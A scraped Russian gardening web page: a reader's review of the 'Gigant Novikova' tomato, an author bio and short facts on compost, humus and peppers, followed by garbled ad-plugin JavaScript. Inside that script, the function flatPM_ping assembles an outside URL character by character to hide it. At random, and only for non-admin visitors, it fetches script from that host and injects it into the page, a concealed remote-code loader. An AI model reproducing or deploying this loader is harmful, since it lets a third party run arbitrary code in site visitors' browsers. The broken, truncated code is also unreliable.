Сорт нравится, вкус отличный, но заметила и некоторые недостатки. Выращиваю в теплице. Если температура днем сильно повышается, растения сбрасывают цветы, даже при хорошем поливе и проветривании. Нередко бывают махровые цветочки, из них получаются плоды сложной формы с жесткими прожилками внутри. И еще: шкурки у помидоров слишком нежные. Плоды, дозревшие на кусте, даже срывать трудно, лопаются прямо в руках. Такие нужно срезать секатором, а еще лучше снимать томаты «бурыми» и дозаривать в помещении. На вкус это не влияет.

Видео

Если вас заинтересовала тема статьи, можете познакомиться с мнением опытного овощевода о сорте томатов «Гигант Новикова» в следующем видеоролике:

Окончила МГРИ им. Орджоникидзе. По основной специальности – горный инженер-геофизик, а значит человек с аналитическим складом ума и разнообразными интересами. Имею собственный дом в деревне (соответственно, опыт огородничества, садоводства, грибоводства, а также возни с домашними животными и птицей). Фрилансер, в отношении своих обязанностей перфекционист и «зануда». Любитель хенд-мейда, создатель эксклюзивных украшений из камней и бисера. Страстный почитатель печатного слова и трепетный наблюдатель всего, что живет и дышит.

Нашли ошибку? Выделите текст мышкой и нажмите:

Фермер из Оклахомы Карл Бернс вывел необычный сорт разноцветной кукурузы, получивший название Rainbow Corn («радужная»). Зерна на каждом початке – разных цветов и оттенков: коричневые, розовые, фиолетовые, голубые, зеленые и др. Такого результата удалось добиться путем многолетнего отбора наиболее окрашенных обычных сортов и их скрещивания.

В маленькой Дании любой участок земли – очень дорогое удовольствие. Поэтому местные садоводы-огородники приспособились выращивать свежие овощи в ведрах, больших пакетах, пенопластовых ящиках, наполненных специальной земляной смесью. Такие агротехнические методы позволяют получать урожай даже в домашних условиях.

Один из самых удобных методов заготовить выращенный урожай овощей, фруктов и ягод – заморозка. Некоторые полагают, что замораживание приводит к потере питательных и полезных свойств растительных продуктов. В результате проведенных исследований ученые выяснили, что снижение пищевой ценности при заморозке практически отсутствует.

Перегной – перепревший навоз или птичий помет. Готовят его так: навоз складывают в кучу или бурт, переслаивая его опилками, торфом и огородной землей. Бурт накрывают пленкой, чтобы стабилизировать температуру и влажность (это нужно для повышения активности микроорганизмов). Удобрение «созревает» в течение 2-5 лет – в зависимости от внешних условий и состава исходного сырья. На выходе получается рыхлая однородная масса с приятным запахом свежей земли.

От сортовых помидоров можно получить «свои» семена для посева на следующий год (если сорт очень понравился). А с гибридными это делать бесполезно: семена-то получатся, но они будут нести наследственный материал не того растения, с которого взяты, а его многочисленных «предков».

Считается, что некоторые овощи и фрукты (огурцы, стеблевой сельдерей, все разновидности капусты, перец, яблоки) обладают «отрицательной калорийностью», то есть при переваривании затрачивается больше калорий, чем в них содержится. На самом деле в пищеварительном процессе расходуется только 10-20% калорий, полученных с едой.

Компост – перепревшие органические остатки самого разного происхождения. Как сделать? В кучу, яму или большой ящик складывают все подряд: кухонные остатки, ботву огородных культур, скошенные до цветения сорняки, тонкие веточки. Все это переслаивают фосфоритной мукой, иногда соломой, землей или торфом. (Некоторые дачники добавляют специальные ускорители компостирования.) Накрывают пленкой. В процессе перепревания кучу периодически ворошат или протыкают для притока свежего воздуха. Обычно компост «зреет» 2 года, но с современными добавками может быть готов и за один летний сезон.

Родина перца – Америка, но основные селекционные работы по выведению сладких сортов проводились, в частности, Ференцем Хорватом (Венгрия) в 20-х гг. XX века в Европе, преимущественно на Балканах. В Россию перец попал уже из Болгарии, потому и получил свое привычное название – «болгарский».

Природные токсины содержатся во многих растениях; не исключение и те, которые выращивают в садах и на огородах. Так, в косточках яблок, абрикосов, персиков есть синильная (цианистоводородная) кислота, а в ботве и кожуре недозревших пасленовых (картофеля, баклажанов, помидоров) – соланин. Но не стоит опасаться: их количество слишком незначительно.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};